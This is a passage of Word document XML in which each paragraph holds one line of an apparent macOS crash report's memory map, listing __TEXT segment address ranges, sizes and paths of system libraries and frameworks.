    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8acba000-00007fff8ad31000 [  476K] r-x/r-x SM=COW  /usr/lib/system/libcorecrypto.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8ad31000-00007fff8ad3e000 [   52K] r-x/r-x SM=COW  /System/Library/Frameworks/OpenDirectory.framework/Versions/A/OpenDirectory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8ad3e000-00007fff8ad4c000 [   56K] r-x/r-x SM=COW  /usr/lib/libbz2.1.0.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8adf8000-00007fff8ae21000 [  164K] r-x/r-x SM=COW  /usr/lib/system/libsystem_info.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8afeb000-00007fff8afee000 [   12K] r-x/r-x SM=COW  /usr/lib/system/libsystem_coreservices.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8c3e7000-00007fff8c4ab000 [  784K] r-x/r-x SM=COW  /System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libvMisc.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8c4ab000-00007fff8c842000 [ 3676K] r-x/r-x SM=COW  /System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8ca83000-00007fff8cd6b000 [ 2976K] r-x/r-x SM=COW  /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/CarbonCore.framework/Versions/A/CarbonCore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8cd6b000-00007fff8cf51000 [ 1944K] r-x/r-x SM=COW  /usr/lib/libicucore.A.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8cf51000-00007fff8cf82000 [  196K] r-x/r-x SM=COW  /System/Library/Frameworks/GSS.framework/Versions/A/GSS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8cf97000-00007fff8cf98000 [    4K] r-x/r-x SM=COW  /usr/lib/libOpenScriptingUtil.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8cfe1000-00007fff8d022000 [  260K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/CloudDocs.framework/Versions/A/CloudDocs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8d45f000-00007fff8d663000 [ 2064K] r-x/r-x SM=COW  /System/Library/Frameworks/CFNetwork.framework/Versions/A/CFNetwork</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8d663000-00007fff8d6aa000 [  284K] r-x/r-x SM=COW  /usr/lib/libauto.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8d6aa000-00007fff8d71f000 [  468K] r-x/r-x SM=COW  /System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/ATS.framework/Versions/A/ATS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8d76e000-00007fff8d773000 [   20K] r-x/r-x SM=COW  /usr/lib/system/libsystem_stats.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8d793000-00007fff8d8b5000 [ 1160K] r-x/r-x SM=COW  .../Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/LaunchServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__TEXT                 00007fff8d8cd000-00007fff8d8d9000 [   48K] r-x/r-x SM=COW  ...Frameworks/ApplicationServices.framework/Versions/A/Frameworks/SpeechSynthesis.framework/Versions/A/SpeechSynthesis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8d8d9000-00007fff8d8dd000 [   16K] r-x/r-x SM=COW  /System/Library/Frameworks/ServiceManagement.framework/Versions/A/ServiceManagement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8dc49000-00007fff8dc52000 [   36K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/AppleSRP.framework/Versions/A/AppleSRP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8dcab000-00007fff8dcac000 [    4K] r-x/r-x SM=COW  /usr/lib/system/libunc.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8ddda000-00007fff8dde0000 [   24K] r-x/r-x SM=COW  /usr/lib/system/libmacho.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8df5c000-00007fff8df77000 [  108K] r-x/r-x SM=COW  /usr/lib/liblzma.5.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8df77000-00007fff8df7b000 [   16K] r-x/r-x SM=COW  /usr/lib/system/libdyld.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8ea04000-00007fff8ecb1000 [ 2740K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/GeoServices.framework/Versions/A/GeoServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8ecdd000-00007fff8ecdf000 [    8K] r-x/r-x SM=COW  /usr/lib/libDiagnosticMessagesClient.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8ece5000-00007fff8ece6000 [    4K] r-x/r-x SM=COW  /usr/lib/system/libkeymgr.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8ecf3000-00007fff8ecf5000 [    8K] r-x/r-x SM=COW  /usr/lib/libSystem.B.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8ecf5000-00007fff8ecf7000 [    8K] r-x/r-x SM=COW  /usr/lib/liblangid.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8f481000-00007fff8f5c4000 [ 1292K] r-x/r-x SM=COW  /usr/lib/libsqlite3.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8fa16000-00007fff8fa22000 [   48K] r-x/r-x SM=COW  /usr/lib/system/libkxld.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8fa22000-00007fff8fa4d000 [  172K] r-x/r-x SM=COW  /usr/lib/system/libdispatch.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8facb000-00007fff8fad4000 [   36K] r-x/r-x SM=COW  /usr/lib/system/libsystem_platform.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8fb4e000-00007fff8fbdb000 [  564K] r-x/r-x SM=COW  /usr/lib/system/libsystem_c.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8fbdb000-00007fff8fbf3000 [   96K] r-x/r-x SM=COW  ...em/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libLinearAlgebra.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8fbf3000-00007fff8fbf5000 [    8K] r-x/r-x SM=COW  /usr/lib/system/libsystem_secinit.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff8fbfd000-00007fff8fc1b000 [  120K] r-x/r-x SM=COW  /usr/lib/libresolv.9.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff907c7000-00007fff90814000 [  308K] r-x/r-x SM=COW  /System/Library/Frameworks/CoreLocation.framework/Versions/A/CoreLocation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff90814000-00007fff9092d000 [ 1124K] r-x/r-x SM=COW  /System/Library/Frameworks/CoreText.framework/Versions/A/CoreText</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff9092d000-00007fff9095b000 [  184K] r-x/r-x SM=COW  /System/Library/Frameworks/CoreVideo.framework/Versions/A/CoreVideo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff9095b000-00007fff90964000 [   36K] r-x/r-x SM=COW  /usr/lib/system/libsystem_dnssd.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__TEXT                 00007fff90964000-00007fff90965000 [    4K] r-x/r-x SM=COW  /System/Library/Frameworks/CoreServices.framework/Versions/A/CoreServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff90f81000-00007fff90f8f000 [   56K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/ProtocolBuffer.framework/Versions/A/ProtocolBuffer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff90f8f000-00007fff90fd0000 [  260K] r-x/r-x SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGLImage.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff9104f000-00007fff91055000 [   24K] r-x/r-x SM=COW  /usr/lib/libheimdal-asn1.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff91055000-00007fff91067000 [   72K] r-x/r-x SM=COW  /usr/lib/libcmph.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff91067000-00007fff9106a000 [   12K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/CoreDuetDebugLogging.framework/Versions/A/CoreDuetDebugLogging</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff913bc000-00007fff91424000 [  416K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/DataDetectorsCore.framework/Versions/A/DataDetectorsCore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff917fd000-00007fff91859000 [  368K] r-x/r-x SM=COW  /System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libTIFF.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff91859000-00007fff9186a000 [   68K] r-x/r-x SM=COW  /usr/lib/libbsm.0.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
